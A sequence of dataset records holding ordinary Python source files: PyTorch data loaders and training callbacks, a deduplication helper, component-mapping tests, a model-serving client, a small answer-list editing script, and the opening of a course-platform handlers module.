elif height:\n        new_name = \"{}_h{}.{}\".format(name,height,file_extension)\n    return new_name\n    \n\nif __name__ == '__main__':\n    app.run(debug=True)","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"126997093","text":"import numpy as np  # used by RandomCrop below\nimport torch\nfrom skimage import transform  # used by Rescale.__call__ below\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import Dataset\n\ndata_loc = './data'\n\nclass Rescale(object):\n    \"\"\"Rescale the image in a sample to a given size.\n\n    Args:\n        output_size (tuple or int): Desired output size. If tuple, output is\n            matched to output_size. If int, smaller of image edges is matched\n            to output_size keeping aspect ratio the same.\n    \"\"\"\n\n    def __init__(self, output_size):\n        assert isinstance(output_size, (int, tuple))\n        self.output_size = output_size\n\n    def __call__(self, sample):\n        image, landmarks = sample['image'], sample['landmarks']\n\n        h, w = image.shape[:2]\n        if isinstance(self.output_size, int):\n            if h > w:\n                new_h, new_w = self.output_size * h / w, self.output_size\n            else:\n                new_h, new_w = self.output_size, self.output_size * w / h\n        else:\n            new_h, new_w = self.output_size\n\n        new_h, new_w = int(new_h), int(new_w)\n\n        img = transform.resize(image, (new_h, new_w))\n\n        # h and w are swapped for landmarks because for images,\n        # x and y axes are axis 1 and 0 respectively\n        landmarks = landmarks * [new_w / w, new_h / h]\n\n        return {'image': img, 'landmarks': landmarks}\n\n\nclass RandomCrop(object):\n    \"\"\"Crop randomly the image in a sample.\n\n    Args:\n        output_size (tuple or int): Desired output size. 
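If tuple, it is taken as (height, width). 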
If int, square crop\n is made.\n \"\"\"\n\n def __init__(self, output_size):\n assert isinstance(output_size, (int, tuple))\n if isinstance(output_size, int):\n self.output_size = (output_size, output_size)\n else:\n assert len(output_size) == 2\n self.output_size = output_size\n\n def __call__(self, sample):\n image, landmarks = sample['image'], sample['landmarks']\n\n h, w = image.shape[:2]\n new_h, new_w = self.output_size\n\n top = np.random.randint(0, h - new_h)\n left = np.random.randint(0, w - new_w)\n\n image = image[top: top + new_h,\n left: left + new_w]\n\n landmarks = landmarks - [left, top]\n\n return {'image': image, 'landmarks': landmarks}\n\n\nclass ToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n\n def __call__(self, sample):\n image, landmarks = sample['image'], sample['landmarks']\n\n # swap color axis because\n # numpy image: H x W x C\n # torch image: C X H X W\n image = image.transpose((2, 0, 1))\n return {'image': torch.from_numpy(image),\n 'landmarks': torch.from_numpy(landmarks)}\n\nclass InfluenceDataset(Dataset):\n \"\"\"dataset.\"\"\"\n\n def __init__(self, data_list, transform=None):\n \"\"\"\n Args:\n csv_file (string): Path to the csv file with annotations.\n root_dir (string): Directory with all the images.\n transform (callable, optional): Optional transform to be applied\n on a sample.\n \"\"\"\n self.data_list = data_list # list of tuples where 1st -> tensor 2nd -> label\n self.transform = transform\n\n def __len__(self):\n return len(self.data_list)\n\n def __getitem__(self, idx):\n # if torch.is_tensor(idx):\n # idx = idx.tolist()\n\n # img_name = os.path.join(self.root_dir,\n # self.landmarks_frame.iloc[idx, 0])\n # image = io.imread(img_name)\n # landmarks = self.landmarks_frame.iloc[idx, 1:]\n # landmarks = np.array([landmarks])\n # landmarks = landmarks.astype('float').reshape(-1, 2)\n # sample = {'image': image, 'landmarks': landmarks}\n\n # if self.transform:\n # sample = self.transform(sample)\n sample = self.data_list[idx]\n return sample\n\ndef data_loader(network, dataset, batch_size):\n if dataset == 'mnist':\n return get_image_data_loader(dataset, batch_size)\n elif dataset == 'cifar_10':\n if network == 'mlp':\n raise Exception('MLP is currently only designed for grayscale images')\n return get_image_data_loader(dataset, batch_size)\n elif dataset == 'cifar_100':\n if network == 'mlp':\n raise Exception('MLP is currently only designed for grayscale images')\n return get_image_data_loader(dataset, batch_size)\n else:\n raise Exception('dataset is not supported')\n\n\ndef get_image_data_loader(dataset_name, batch_size):\n if dataset_name == 'mnist':\n return mnist_data_loader(batch_size)\n elif dataset_name == 'cifar_10':\n return cifar_10_data_loader(batch_size)\n elif dataset_name == 'cifar_100':\n return cifar_100_data_loader(batch_size)\n else:\n raise Exception('dataset is not supported')\n\n\ndef mnist_data_loader(batch_size):\n transform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))])\n dataset = datasets.MNIST(root=data_loc, train=True, download=True, transform=transform)\n train_loader = torch.utils.data.DataLoader(dataset, shuffle=True, batch_size=batch_size, num_workers=1)\n test_dataset = datasets.MNIST(root=data_loc, train=False, transform=transform, )\n test_loader = torch.utils.data.DataLoader(test_dataset, shuffle=False, batch_size=batch_size)\n return train_loader, test_loader\n\n\ndef cifar_10_data_loader(batch_size):\n transform_train = transforms.Compose(\n 
[transforms.RandomCrop(32, padding=4), transforms.RandomHorizontalFlip(), transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ])\n transform_test = transforms.Compose([transforms.ToTensor(), transforms.Normalize(\n (0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ])\n dataset = datasets.CIFAR10(root=data_loc, train=True, download=True, transform=transform_train)\n train_loader = torch.utils.data.DataLoader(dataset, shuffle=False, batch_size=batch_size, num_workers=1)\n test_dataset = datasets.CIFAR10(root=data_loc, train=False, transform=transform_test)\n test_loader = torch.utils.data.DataLoader(test_dataset, shuffle=False, batch_size=batch_size)\n return dataset, train_loader, test_loader\n\n\ndef cifar_100_data_loader(batch_size):\n transform_train = transforms.Compose(\n [transforms.RandomCrop(32, padding=4), transforms.RandomHorizontalFlip(), transforms.ToTensor(),\n transforms.Normalize((0.5071, 0.4867, 0.4408), (0.2675, 0.2565, 0.2761)), ])\n transform_test = transforms.Compose([transforms.ToTensor(), transforms.Normalize(\n (0.5071, 0.4867, 0.4408), (0.2675, 0.2565, 0.2761)), ])\n dataset = datasets.CIFAR100(root=data_loc, train=True, download=True, transform=transform_train)\n train_loader = torch.utils.data.DataLoader(dataset, shuffle=True, batch_size=batch_size, num_workers=1)\n test_dataset = datasets.CIFAR100(root=data_loc, train=False, transform=transform_test, )\n test_loader = torch.utils.data.DataLoader(test_dataset, shuffle=False, batch_size=batch_size)\n return train_loader, test_loader\n","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":7087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"438847030","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of INSPIRE.\n# Copyright (C) 2016 CERN.\n#\n# INSPIRE is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# INSPIRE is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with INSPIRE. If not, see .\n#\n# In applying this licence, CERN does not waive the privileges and immunities\n# granted to it by virtue of its status as an Intergovernmental Organization\n# or submit itself to any jurisdiction.\n\nfrom __future__ import absolute_import, division, print_function\n\nimport six\n\n\ndef dedupe_list(l):\n \"\"\"Remove duplicates from a list preserving the order.\n\n We might be tempted to use the list(set(l)) idiom,\n but it doesn't preserve the order, which hinders\n testability.\"\"\"\n result = []\n\n for el in l:\n if el not in result:\n result.append(el)\n\n return result\n\n\ndef dedupe_list_of_dicts(ld):\n \"\"\"Remove duplicates from a list of dictionaries preserving the order.\n\n We can't use the generic list helper because a dictionary isn't\n hashable. 
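Instead, each dict is recursively frozen into nested frozensets/tuples\n    and tracked in a set of seen values, for example (illustrative):\n\n        >>> dedupe_list_of_dicts([{'a': 1}, {'a': 1}, {'b': 2}])\n        [{'a': 1}, {'b': 2}]\n\n    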
Adapted from http://stackoverflow.com/a/9427216/374865.\"\"\"\n\n    def _freeze(o):\n        \"\"\"Recursively freezes a dict into a hashable object.\n\n        Adapted from http://stackoverflow.com/a/21614155/374865.\"\"\"\n        if isinstance(o, dict):\n            return frozenset((k, _freeze(v)) for k, v in six.iteritems(o))\n        elif isinstance(o, (list, tuple)):\n            return tuple(_freeze(v) for v in o)\n        else:\n            return o\n\n    result = []\n    seen = set()\n\n    for d in ld:\n        f = _freeze(d)\n        if f not in seen:\n            result.append(d)\n            seen.add(f)\n\n    return result\n","sub_path":"inspirehep/utils/dedupers.py","file_name":"dedupers.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"336434856","text":"#This is where the training loop takes place\nimport torch\n\ndef accuracy(out, yb): return (torch.argmax(out, dim=1)==yb).float().mean()\n\ndef fit(conf, learner): #model, loss_func, opt, train_dl, valid_dl):\n    for epoch in range(conf.epochs):\n\n        learner.model.train()\n\n        for xb,yb in learner.data['train']:\n            xb = xb.view(xb.shape[0],28*28)\n            loss = learner.loss_func(learner.model(xb), yb)\n            loss.backward()\n            learner.opt.step()\n            learner.opt.zero_grad()\n\n        learner.model.eval()\n\n        with torch.no_grad():\n            tot_loss,tot_acc = 0.,0.\n            for xb,yb in learner.data['val']:\n                xb = xb.view(xb.shape[0],28*28)\n                pred = learner.model(xb)\n                tot_loss += learner.loss_func(pred, yb)\n                tot_acc += accuracy(pred,yb)\n            nv = len(learner.data['val'])\n            print(epoch, tot_loss/nv, tot_acc/nv)\n    return tot_loss/nv, tot_acc/nv\n\n##! go over fast.ai #10 and deep-dive the hellouta these classes\nclass Callback():\n    _order = 0\n    def set_runner(self, run): self.run = run\n    def __getattr__(self, k): return getattr(self.run, k)\n\n    @property\n    def name(self):\n        # attribute name Runner registers this callback under,\n        # e.g. TrainEvalCallback -> 'train_eval' (the 'Callback' suffix is dropped)\n        cls = self.__class__.__name__\n        if cls.endswith('Callback'): cls = cls[:-len('Callback')]\n        return ''.join('_' + c.lower() if c.isupper() and i else c.lower()\n                       for i, c in enumerate(cls)) or 'callback'\n\n    def __call__(self, cb_name):\n        f = getattr(self, cb_name, None)\n        if f and f(): return True # a truthy result tells Runner to skip the default behaviour for this event\n        return False\n\nclass TrainEvalCallback(Callback):\n    def begin_fit(self):\n        self.run.n_epochs=0.\n        self.run.n_iter=0\n    \n    def after_batch(self):\n        if not self.in_train: return\n        self.run.n_epochs += 1./self.iters\n        self.run.n_iter += 1\n    \n    def begin_epoch(self):\n        self.run.n_epochs=self.epoch\n        self.model.train()\n        self.run.in_train=True\n\n    def begin_validate(self):\n        self.model.eval()\n        self.run.in_train=False\n\nclass CancelTrainException(Exception): pass\nclass CancelEpochException(Exception): pass\nclass CancelBatchException(Exception): pass\n\n\ndef listify(o):\n    # minimal stand-in for fastai's listify: normalize None/scalars/iterables to a list\n    if o is None: return []\n    if isinstance(o, list): return o\n    if isinstance(o, (tuple, set)): return list(o)\n    return [o]\n\n\nclass Runner():\n    def __init__(self, cbs=None, cb_funcs=None):\n        cbs = listify(cbs)\n        for cbf in listify(cb_funcs):\n            cb = cbf()\n            setattr(self, cb.name, cb)\n            cbs.append(cb)\n        self.stop,self.cbs = False,[TrainEvalCallback()]+cbs\n\n    @property\n    def opt(self): return self.learn.opt\n    @property\n    def model(self): return self.learn.model\n    @property\n    def loss_func(self): return self.learn.loss_func\n    @property\n    def data(self): return self.learn.data\n\n    def one_batch(self, xb, yb):\n        try:\n            self.xb,self.yb = xb,yb\n            self('begin_batch')\n            self.pred = self.model(self.xb)\n            self('after_pred')\n            self.loss = self.loss_func(self.pred, self.yb)\n            self('after_loss')\n            if not self.in_train: return\n            self.loss.backward()\n            self('after_backward')\n            self.opt.step()\n            self('after_step')\n            self.opt.zero_grad()\n        except CancelBatchException: self('after_cancel_batch')\n        finally: self('after_batch')\n\n    def all_batches(self, dl):\n        self.iters = len(dl)\n        try:\n            for xb,yb in dl: self.one_batch(xb, yb)\n        except CancelEpochException: self('after_cancel_epoch')\n\n    def fit(self, epochs, learn):\n        # NB: expects learn.data to expose train_dl/valid_dl (a DataBunch-style\n        # object), unlike the plain {'train': ..., 'val': ...} dict used by fit() above\n        self.epochs,self.learn,self.loss = epochs,learn,torch.tensor(0.)\n\n        try:\n            for cb in self.cbs: cb.set_runner(self)\n            self('begin_fit')\n            for epoch in range(epochs):\n                self.epoch = epoch\n                if not self('begin_epoch'): self.all_batches(self.data.train_dl)\n\n                with torch.no_grad(): \n                    if not self('begin_validate'): self.all_batches(self.data.valid_dl)\n                self('after_epoch')\n            \n        except CancelTrainException: self('after_cancel_train')\n        finally:\n            self('after_fit')\n            self.learn = None\n\n    def __call__(self, cb_name):\n        res = False\n        for cb in sorted(self.cbs, key=lambda x: x._order): res = cb(cb_name) or res\n        return res","sub_path":"pseudo-trainer.py","file_name":"pseudo-trainer.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"395452261","text":"from src.components.operations import *\nfrom src.goals.operations import *\n\n\ndef test_mapping_simple():\n    component_library = ComponentsLibrary(name=\"cogomoLTL\")\n\n    component_library.add_components(\n        [\n            SimpleComponent(component_id=\"c0\",\n                            assumptions=[\"a\"],\n                            guarantees=[\"b\"]),\n            SimpleComponent(component_id=\"c1-default\",\n                            assumptions=[\"a\", \"l\", \"k\"],\n                            guarantees=[\"b\", \"x > 5\"]),\n            SimpleComponent(component_id=\"c2_conditional_scope_no_context\",\n                            assumptions=[\"b\", \"x > 10\"],\n                            guarantees=[\"y > 20\"]),\n            SimpleComponent(component_id=\"c3\",\n                            assumptions=[\"b\", \"x > 3\"],\n                            guarantees=[\"y > 40\"]),\n        ])\n\n    specification = CGTGoal(\n        name=\"specification\",\n        contracts=[SimpleContract(guarantees=[\"y > 10\"])])\n\n    mapping(component_library, specification)\n\n    print(specification)\n\n\ndef test_mapping_simple_ports():\n    component_library = ComponentsLibrary(name=\"cogomoLTL\")\n\n    component_library.add_components(\n        [\n            Component(component_id=\"c0\",\n                      variables={\"a\": \"boolean\", \"b\": 
\"boolean\"},\n assumptions=[\"a\"],\n guarantees=[\"b\"]),\n Component(component_id=\"c1-default\",\n variables={\"a\": \"boolean\", \"b\": \"boolean\", \"x\": \"0..100\", \"l\": \"boolean\", \"k\": \"boolean\"},\n assumptions=[\"a_port_1\", \"a_port_2\", \"l\", \"k\"],\n guarantees=[\"b\", \"x > 5\"]),\n Component(component_id=\"c2_conditional_scope_no_context\",\n variables={\"b\": \"boolean\", \"x\": \"0..100\", \"y\": \"0..100\"},\n assumptions=[\"b\", \"x > 10\"],\n guarantees=[\"y > 20\"]),\n Component(component_id=\"c3\",\n variables={\"b\": \"boolean\", \"x\": \"0..100\", \"y\": \"0..100\"},\n assumptions=[\"b\", \"x > 3\"],\n guarantees=[\"y > 40\"]),\n ])\n\n specification = CGTGoal(\n name=\"specification\",\n contracts=[Contract(variables={\"y\": \"0..100\"}, guarantees=[\"y > 10\"])])\n\n mapping(component_library, specification)\n\n print(specification)\n\n\ndef test_mapping():\n component_library = ComponentsLibrary(name=\"cogomoLTL\")\n\n component_library.add_components(\n [\n Component(component_id=\"c0\",\n variables={\"a\": \"boolean\", \"b\": \"boolean\"},\n assumptions=[\"a\"],\n guarantees=[\"b\"]),\n Component(component_id=\"c1-default\",\n variables={\"a\": \"boolean\", \"b\": \"boolean\", \"x\": \"0..100\", \"l\": \"boolean\", \"k\": \"boolean\"},\n assumptions=[\"a\", \"l\", \"k\"],\n guarantees=[\"b\", \"x > 5\"]),\n Component(component_id=\"c2_conditional_scope_no_context\",\n variables={\"b\": \"boolean\", \"x\": \"0..100\", \"y\": \"0..100\"},\n assumptions=[\"b\", \"x > 10\"],\n guarantees=[\"y > 20\"]),\n Component(component_id=\"c3\",\n variables={\"b\": \"boolean\",\n \"x\": \"0..100\",\n \"y\": \"0..100\",\n \"t\": \"boolean\",\n \"r\": \"boolean\",\n \"e\": \"boolean\"\n },\n assumptions=[\"b\", \"x > 3\", \"t\", \"r\", \"e\"],\n guarantees=[\"y > 40\"]),\n BooleanComponent(component_id=\"c9\", assumptions=[\"a3\"], guarantees=[\"t\"]),\n BooleanComponent(component_id=\"c10\", assumptions=[\"a2\"], guarantees=[\"r\"]),\n BooleanComponent(component_id=\"c11\", assumptions=[\"a1\"], guarantees=[\"e\"]),\n BooleanComponent(component_id=\"c12\", assumptions=[\"b\"], guarantees=[\"a3\"]),\n BooleanComponent(component_id=\"c5\", assumptions=[\"a\"], guarantees=[\"a2\"]),\n BooleanComponent(component_id=\"c6\", assumptions=[\"r4\"], guarantees=[\"a1\"]),\n BooleanComponent(component_id=\"c7\", assumptions=[\"r4\"], guarantees=[\"a3\"]),\n BooleanComponent(component_id=\"c8\", assumptions=[\"t4\"], guarantees=[\"r4\"])\n ])\n\n specification = CGTGoal(\n name=\"specification\",\n contracts=[Contract(variables={\"y\": \"0..100\"}, guarantees=[\"y > 10\"])])\n\n mapping(component_library, specification)\n\n print(specification)","sub_path":"tests/goals/test_mapping.py","file_name":"test_mapping.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"11385212","text":"import json\nimport os\n\nimport requests\n\nCORTEX_ENDPOINT = os.getenv('CORTEX_ENV_ENDPOINT')\nCORTEX_MODEL_NAME = os.getenv('CORTEX_MODEL_NAME')\nassert CORTEX_ENDPOINT\nassert CORTEX_MODEL_NAME\n\nENDPOINT = f'{CORTEX_ENDPOINT}/{CORTEX_MODEL_NAME}'\n\n\ndef make_predict(json_request):\n headers = {\n 'Content-Type': 'application/json',\n }\n data = json.dumps(json_request)\n response = requests.post(ENDPOINT, headers=headers, data=data)\n return response.json()\n\n\ndef main():\n data = {\n \"times_pregnant\": 1,\n \"pgc\": 148,\n \"dbp\": 72,\n \"tst\": 35,\n \"insulin\": 100,\n \"bmi\": 33.6,\n 
\"pedigree\": 0.627,\n \"age\": 50,\n }\n response = make_predict(data)\n print(\n f'The probability of this person to have diabetes: '\n f'{response[\"has_diabetes\"][0]}')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/cortex/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"578365073","text":"\r\n'''C# function that contained a list of correct test answers that needed to be changed. Instead of counting through each answer manually I created a python script that would allow me to choose which question to modify, and then print out the correct answers list in C# format. \r\n public class TestGrader\r\n {\r\n\r\n public List correctAnswers = new List { \"d\", \"d\", \"d\", \"c\", \"c\", \"c\", \"b\", \"a\", \"b\", \"a\", \"c\", \"c\", \"d\", \"d\", \"a\", \"d\", \"c\", \"d\", \"d\", \"b\", \"c\", \"a\", \"a\", \"d\", \"b\", \"c\", \"c\", \"a\", \"b\", \"c\", \"c\", \"d\", \"b\", \"d\", \"d\", \"d\", \"a\", \"c\", \"b\", \"c\", \"c\", \"c\", \"a\", \"b\", \"c\", \"a\", \"b\", \"d\", \"b\", \"b\", \"b\", \"d\", \"d\", \"b\", \"b\", \"b\", \"b\", \"d\", \"d\", \"a\", \"d\", \"c\", \"c\", \"a\", \"c\", \"b\", \"b\", \"a\", \"a\", \"a\", \"a\", \"c\", \"d\", \"d\", \"a\", \"a\", \"c\", \"d\", \"a\", \"d\", \"d\", \"a\", \"d\", \"d\", \"c\", \"b\", \"c\", \"a\", \"c\", \"d\", \"d\", \"b\", \"d\", \"b\", \"c\", \"b\", \"b\", \"a\", \"c\", \"c\" };\r\n public List userAnswers;\r\n public List questionsAnsweredWrong = new List();\r\n public List reportQuestionsAnsweredWrong = new List();\r\n public int score = 0;\r\n\r\n'''\r\n\r\n\r\n\r\nx = [\"d\", \"d\", \"d\", \"c\", \"c\", \"c\", \"b\", \"a\", \"b\", \"a\", \"c\", \"c\", \"d\", \"d\", \"a\", \"d\", \"c\", \"d\", \"d\", \"b\", \"c\", \"a\", \"a\", \"d\", \"b\", \"c\", \"c\", \"a\", \"b\", \"d\", \"c\", \"d\", \"b\", \"d\", \"d\", \"d\", \"a\", \"c\", \"b\", \"c\", \"c\", \"c\", \"a\", \"b\", \"c\", \"a\", \"b\", \"d\", \"b\", \"b\", \"b\", \"d\", \"d\", \"b\", \"b\", \"b\", \"b\", \"d\", \"d\", \"a\", \"d\", \"c\", \"c\", \"a\", \"c\", \"b\", \"b\", \"a\", \"a\", \"a\", \"a\", \"c\", \"d\", \"d\", \"a\", \"a\", \"c\", \"d\", \"a\", \"d\", \"d\", \"a\", \"d\", \"d\", \"c\", \"b\", \"c\", \"a\", \"c\", \"d\", \"d\", \"b\", \"d\", \"b\", \"c\", \"b\", \"b\", \"a\", \"c\", \"c\" ]\r\n\r\ndef getListOfAnswers():\r\n global x\r\n #Replace the path to the location of ComputerBasicsTestController.cs with the correct path on your machine\r\n file = open(\"D:\\K\\LMS_MVC\\LMS_MVC\\Controllers/ComputerBasicsTestController.cs\", 'r')\r\n for line in file:\r\n if 'public List correctAnswers' in line:\r\n line = line.split('{')[1].replace('}','').replace(';','').replace('\\n','').replace('\"','').replace(' ','')\r\n answers = line.split(',')\r\n answers.remove('')\r\n x = answers\r\n\r\ndef changeAns():\r\n ans = int(input(\"What question do you want to change (1-100)? 
\"))\r\n if ans < 1 or ans >100:\r\n print(\"Not a valid question number!\")\r\n changeAns()\r\n print(\"Number \" + str(ans) + \" is \" + x[ans-1])\r\n change = input(\"Enter the correct answer (a,b,c,d): \")\r\n if change in ['a','b','c','d']:\r\n x[ans-1] = change\r\n else:\r\n print(\"Not a valid answer!\")\r\n changeAns()\r\n\r\ndef getCSharpList():\r\n List = 'public List correctAnswers = new List ' + str(x).replace('[','{').replace(']','}').replace('\\'','\"') + ';'\r\n print(\"Copy and paste this list into your C# code\\n\")\r\n print(List)\r\n\r\ndef main():\r\n print(\"Current correct answer list is \")\r\n print(str(x))\r\n more = True\r\n while more == True:\r\n changeAns()\r\n check = input(\"Change another answer? (y/n): \").lower()\r\n if check != 'y':\r\n more = False\r\n getCSharpList()\r\ntry:\r\n getListOfAnswers()\r\nexcept:\r\n print(\"Couldn't get list from C# Controller\")\r\nmain()\r\n","sub_path":"correct answers edit.py","file_name":"correct answers edit.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"622866930","text":"from datetime import datetime, timedelta\n\nfrom src.config import APP_CONFIG\nfrom src.services import RoundService\nfrom tests.fixtures import create_round, create_sell_order\n\nround_service = RoundService(config=APP_CONFIG)\n\n\ndef test_get_all():\n round_id = create_round(\"1\")[\"id\"]\n round_id2 = create_round(\"2\")[\"id\"]\n rounds = round_service.get_all()\n assert len(rounds) == 2\n assert frozenset([r[\"id\"] for r in rounds]) == frozenset([round_id, round_id2])\n\n\ndef test_get_active():\n active_id = create_round(\n end_time=datetime.now() + timedelta(weeks=1), is_concluded=False\n )[\"id\"]\n\n active_round = round_service.get_active()\n assert active_round[\"id\"] == active_id\n\n\ndef test_get_active__all_in_the_past():\n create_round(end_time=datetime.now() - timedelta(weeks=1), is_concluded=True)\n create_round(end_time=datetime.now() - timedelta(weeks=2), is_concluded=False)\n assert round_service.get_active() is None\n\n\ndef test_get_active__all_concluded():\n create_round(end_time=datetime.now() + timedelta(weeks=1), is_concluded=True)\n create_round(end_time=datetime.now() + timedelta(weeks=2), is_concluded=True)\n assert round_service.get_active() is None\n\n\ndef test_should_round_start__unique_sellers():\n create_sell_order(\"1\", number_of_shares=5, round_id=None)\n assert not round_service.should_round_start()\n create_sell_order(\"2\", number_of_shares=5, round_id=None)\n assert round_service.should_round_start()\n create_sell_order(\"3\", number_of_shares=5, round_id=None)\n assert round_service.should_round_start()\n\n\ndef test_should_round_start__big_shares_amount():\n create_sell_order(\"1\", number_of_shares=1000, round_id=None)\n assert round_service.should_round_start()\n","sub_path":"tests/services/test_round_service.py","file_name":"test_round_service.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"311984391","text":"# Copyright 2013 Google Inc. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom models.rosebotics_models import RoseboticsStudent\nfrom google.appengine.api import users\n\"\"\"Handlers for generating various frontend pages.\"\"\"\n\nimport copy\nimport datetime\nimport logging\nimport urllib\nimport urlparse\n\nfrom common import jinja_utils\nfrom google.appengine.ext import db\nfrom models import courses\nfrom models import models\nfrom models import student_work\nfrom models import transforms\nfrom models.counters import PerfCounter\nfrom models.models import Student\nfrom models.models import StudentProfileDAO\nfrom models.review import ReviewUtils\nfrom models.student_work import StudentWorkUtils\nfrom modules import courses as courses_module\nfrom modules.review import domain\nfrom tools import verify\nfrom utils import BaseHandler\nfrom utils import BaseRESTHandler\nfrom utils import CAN_PERSIST_ACTIVITY_EVENTS\nfrom utils import CAN_PERSIST_PAGE_EVENTS\nfrom utils import CAN_PERSIST_TAG_EVENTS\nfrom utils import HUMAN_READABLE_DATETIME_FORMAT\nfrom utils import TRANSIENT_STUDENT\nfrom utils import XsrfTokenManager\n\n\n__author__ = 'Saifu Angto (saifu@google.com)'\n\n\n\n\n\nCOURSE_EVENTS_RECEIVED = PerfCounter(\n 'gcb-course-events-received',\n 'A number of activity/assessment events received by the server.')\n\nCOURSE_EVENTS_RECORDED = PerfCounter(\n 'gcb-course-events-recorded',\n 'A number of activity/assessment events recorded in a datastore.')\n\nUNIT_PAGE_TYPE = 'unit'\nACTIVITY_PAGE_TYPE = 'activity'\nASSESSMENT_PAGE_TYPE = 'assessment'\nASSESSMENT_CONFIRMATION_PAGE_TYPE = 'test_confirmation'\n\nTAGS_THAT_TRIGGER_BLOCK_COMPLETION = ['attempt-activity']\nTAGS_THAT_TRIGGER_COMPONENT_COMPLETION = ['tag-assessment']\nTAGS_THAT_TRIGGER_HTML_COMPLETION = ['attempt-lesson']\n\n\ndef get_first_lesson(handler, unit_id):\n \"\"\"Returns the first lesson in the unit.\"\"\"\n lessons = handler.get_course().get_lessons(unit_id)\n return lessons[0] if lessons else None\n\n\ndef _get_selected_unit_or_first_unit(handler):\n # Finds unit requested or a first unit in the course.\n u = handler.request.get('unit')\n unit = handler.get_course().find_unit_by_id(u)\n if not unit:\n units = handler.get_course().get_units()\n for current_unit in units:\n if verify.UNIT_TYPE_UNIT == current_unit.type:\n unit = current_unit\n break\n return unit\n\n\ndef _get_selected_or_first_lesson(handler, unit):\n # Find lesson requested or a first lesson in the unit.\n l = handler.request.get('lesson')\n lesson = None\n if not l:\n lesson = get_first_lesson(handler, unit.unit_id)\n else:\n lesson = handler.get_course().find_lesson_by_id(unit, l)\n return lesson\n\n\ndef extract_unit_and_lesson(handler):\n \"\"\"Loads unit and lesson specified in the request.\"\"\"\n\n unit = _get_selected_unit_or_first_unit(handler)\n if not unit:\n return None, None\n return unit, _get_selected_or_first_lesson(handler, unit)\n\n\ndef extract_unit_and_lesson_or_assessment(handler):\n unit = _get_selected_unit_or_first_unit(handler)\n 
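# e.g. a request for 'unit?unit=4&assessment=9' yields (unit 4, no lesson,\n    # assessment 9); with neither param given, the fall-through below picks the\n    # unit's pre-assessment, then its first lesson, then its post-assessment.\n    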
if not unit:\n return None, None, None\n\n lesson = None\n lesson_id = handler.request.get('lesson')\n if lesson_id:\n lesson = handler.get_course().find_lesson_by_id(unit, lesson_id)\n\n assessment = None\n assessment_id = handler.request.get('assessment')\n if assessment_id:\n assessment = handler.get_course().find_unit_by_id(assessment_id)\n\n if lesson or assessment:\n return unit, lesson, assessment\n\n if unit.pre_assessment:\n return unit, None, handler.get_course().find_unit_by_id(\n unit.pre_assessment)\n\n first_lesson = get_first_lesson(handler, unit.unit_id)\n if first_lesson:\n return unit, first_lesson, None\n\n if unit.post_assessment:\n return unit, None, handler.get_course().find_unit_by_id(\n unit.post_assessment)\n\n return unit, None, None\n\n\ndef get_unit_and_lesson_id_from_url(handler, url):\n \"\"\"Extracts unit and lesson ids from a URL.\"\"\"\n url_components = urlparse.urlparse(url)\n query_dict = urlparse.parse_qs(url_components.query)\n\n if 'unit' not in query_dict:\n return None, None\n\n unit_id = query_dict['unit'][0]\n\n lesson_id = None\n if 'lesson' in query_dict:\n lesson_id = query_dict['lesson'][0]\n else:\n lesson_id = get_first_lesson(handler, unit_id).lesson_id\n\n return unit_id, lesson_id\n\n\ndef create_readonly_assessment_params(content, answers):\n \"\"\"Creates parameters for a readonly assessment in the view templates.\"\"\"\n assessment_params = {\n 'preamble': content['assessment']['preamble'],\n 'questionsList': content['assessment']['questionsList'],\n 'answers': answers,\n }\n return assessment_params\n\n\ndef filter_assessments_used_within_units(units):\n # Remove assessments that are to be treated as if they were in a unit.\n referenced_assessments = set()\n for unit in units:\n if unit.type == verify.UNIT_TYPE_UNIT:\n if unit.pre_assessment:\n referenced_assessments.add(unit.pre_assessment)\n if unit.post_assessment:\n referenced_assessments.add(unit.post_assessment)\n ret = []\n for unit in list(units):\n if unit.unit_id not in referenced_assessments:\n ret.append(unit)\n return ret\n\n\ndef augment_assessment_units(course, student):\n \"\"\"Adds additional fields to assessment units.\"\"\"\n rp = course.get_reviews_processor()\n\n for unit in course.get_units():\n if unit.type == 'A':\n if 